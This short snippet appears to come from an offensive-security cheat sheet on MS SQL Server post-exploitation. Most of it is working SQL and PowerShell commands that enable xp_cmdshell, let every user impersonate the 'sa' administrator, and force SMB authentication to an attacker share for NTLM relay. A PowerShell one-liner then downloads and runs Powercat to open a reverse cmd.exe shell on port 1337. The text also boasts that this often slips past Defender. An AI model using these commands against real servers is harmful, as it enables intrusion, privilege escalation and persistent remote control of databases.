MS SQL includes the xp_cmdshell
“extended”procedure, which allows a shell command to be called. This is disabled by default, but if enabled it can be used in a trigger to provide persistence on database activity. Powercat , a re-implementation of netcat in pure PowerShell , is useful here.
-- Enable MS SQL "advanced options"
sp_configure ' Show Advanced Options ' , 1 ;
-- Enable xp_cmdshell stored procedure
sp_configure ' xp_cmdshell ' , 1 ;
--- OPTIONAL: Allow all users to impersonate the "sa" (database
--- administrator) user (this enables low-privilege website users
--- to run xp_cmdshell)
USE master ;
GRANT impersonate ON login ::sa TO [public];
-- Coerce MS SQL to connecting using SMB to an attacker at
-- Useful for NTLM relay attacks (if SMB signing isn't
-- turned on, that is).
EXEC master . sys .xp_dirtree ' \\\share ' , 1 , 1 ;
-- Download an execute Powercat from an attacker at
-- (using the built-in Python web server) and connect back to
-- that IP on port 1337. Note that this in general should be
-- caught by IDS/IDP systems, including Defender... But I've
-- actually had it work for me out-of-the-box a surprising
-- number of times.
EXEC master . sys .xp_cmdshell ' powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString( '' '' ); powercat -c -p 1337 -e cmd.exe" '